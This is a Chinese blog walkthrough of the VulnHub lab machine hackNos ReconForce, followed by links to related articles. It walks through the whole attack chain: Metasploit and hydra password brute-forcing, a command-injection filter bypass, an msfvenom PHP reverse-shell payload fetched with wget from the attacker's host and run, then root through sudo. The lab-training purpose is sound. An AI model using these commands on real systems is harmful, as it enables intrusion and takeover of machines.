VulnHub:Hacknos-ReconForce

最新推荐文章于 2024-07-24 15:20:08 发布
最新推荐文章于 2024-07-24 15:20:08 发布
阅读量242 收藏 2
点赞数 5
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140390073
版权
一、信息收集

使用netdiscover工具进行主机发现...出现PCS Systemtechnik GmbH就是目标靶机...使用Nmap进行详细的扫描发现开放了21/22/80端口....

netdiscover -i eth0 -r 192.168.7.0/24

网址进行访问

点击页面里面的Troubleshoot会出现登录框

目录扫描也没有扫出什么信息

尝试ftp匿名登录

发现一个“Security@hackNos”

不知道登录名是什么,也懒得测试,直接拿msf爆破,连找字典都省了。唯一需要注意的是把测试ftp时候的暗语“Security@hackNos”加入到密码字典中

使用msf爆破

msfconsole
use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.7.104
exploit

爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图

看起来可能存在命令执行,输入127.0.0.1 |ls

即127.0.0.1| id被拦截而127.0.0.1|id不被拦截,那么直接用|不加空格就可以绕过过滤

利用Burp抓包,执行命令

二、反弹shell

使用MSF生成一个PHP木马并开启一个http服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..

1、kali执行

里面的IP为kali的IP
生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.117 lport=4444 -f raw > shell.php

开启web服务,重新开启一个窗口
python3 -m http.server 80    

开启msf监听,下面的命令在msf环境里面执行
msfconsole命令将进入msf环境

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.117
exploit

2、靶机执行

wget http%3a//192.168.7.117/shell.php		# 下载恶意文件
php shell.php		# 运行恶意文件

执行以下命令

shell

python -c 'import pty; pty.spawn("/bin/bash")'

cat /home/recon/user.txt

接下来就需要切换身份为 recon 了,前面曾使用msf爆破过网站,将其字典拿过来,供hydra爆破。
爆破出用户名:recon,密码:Security@hackNos

hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.104

直接ssh recon@192.168.7.104切换用户

三、提权

方法1:直接sudo su切换到root用户

wbplife
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
Vulnhub靶机:HACKNOS_ RECONFORCE (V1.1)
LainWith的博客
02-05 1966
目录介绍信息收集主机发现主机信息探测测试21(ftp)访问网站目录扫描登录爆破命令执行反弹shellFlag1切换身份提权获取Flag2方法1:sudo提权方法2:docer提权参考 介绍 系列: hackNos(此系列共7台) 发布日期:2019 年 11 月 29 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: msf爆破网站登录框 命令执行漏洞 msf反弹shell sudo提权、docker提权 靶机地址:https://www.vulnhub.com/entry
vulnhub靶机 Os-hackNos-1
weixin_46107179的博客
03-02 3862
Os-hackNos-1: 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 下载好靶机之后,如果通过虚拟机打开,不能获取ip地址,kali机也扫描不到靶机ip地址的话,就在启动界面按shift,会出现该画面 然后按e进入编辑界面,将ro改为rw single init=/bin/bash 然后按Ctrl+x进入命令行,ip -a查看网卡,名称为ens33,然后对网卡信息进行编辑 vim /etc/network/interfaces改为如下
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3168
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
vulnhub-hackNos-Reconforce
qq_41810304的博客
02-26 327
下载地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 前言: 作为小白(此处省略n个字),文章提到的工具及漏洞仅用于学习。最近有没有什么好看的番剧啊,求推荐啊!!!蹲在家里好无聊啊!!! Kali:192.168.1.4 目标机:192.168.1.28 信息收集(确切的说应该是端口扫描): 漏洞挖掘: 从扫...
VulnHub系列』hackNos: ReconForce-Walkthrough
ins1ght的博客
01-20 1738
这是我完成的VulnHub上的第34个靶机。靶机发布日期:2020年1月11日,难度:简单-中等。标签:墙裂的信息收集、命令注入。
Vulnhub-Os-hackNos-1(包含靶机获取不了IP地址)
m0_60894143的博客
07-07 806
发现wget具有suid权限,而且普通用户可以执行,那么可以通过下载目标靶机上的passwd文件,然后添加一个有root权限的用户到passwd文件中,然后使用wget -O将内容重定向到目标靶机的/etc/passwd中。https://download.vulnhub.com/hacknos/Os-hackNos-1.ova #靶机下载地址。需要搜索到带有s的文件,开始查找 find / -perm -u=s -type f 2>/dev/null。推荐使用arp-scan -l。
Vulnhub:ReconForce-01.1靶机
qq_43884092的博客
02-20 95
提示需要登录,使用之前的得到的提示作为密码,用户为admin,可以登录。访问目标ftp得到提示:Security@hackNos。本地开启http服务,让目标下载php反弹shell。使用之前的道德密码切换到用户recon。靶机:192.168.111.200。使用管道符可以执行命令。
Hacknos-ReconForce靶机
m0_73124588的博客
07-12 704
将密码加入/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt字典。找到了root.txt文件查看文件,找到flag。使用hydra进行爆破,出了登录用户和密码。找到user.txt用户文件,查看文件。靶机:192.168.43.191。查看用户信息,找到了recon用户。查看文件,找到recon。查看out.php文件。发现了命令执行的地方。查看root用户目录。
Hacknos-ReconForce靶机渗透测试
weixin_58786230的博客
07-12 237
【代码】Hacknos-ReconForce靶机渗透测试。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 525
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
等级保护 总结2
最新发布
qq_25467441的博客
07-24 419
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 985
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 514
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值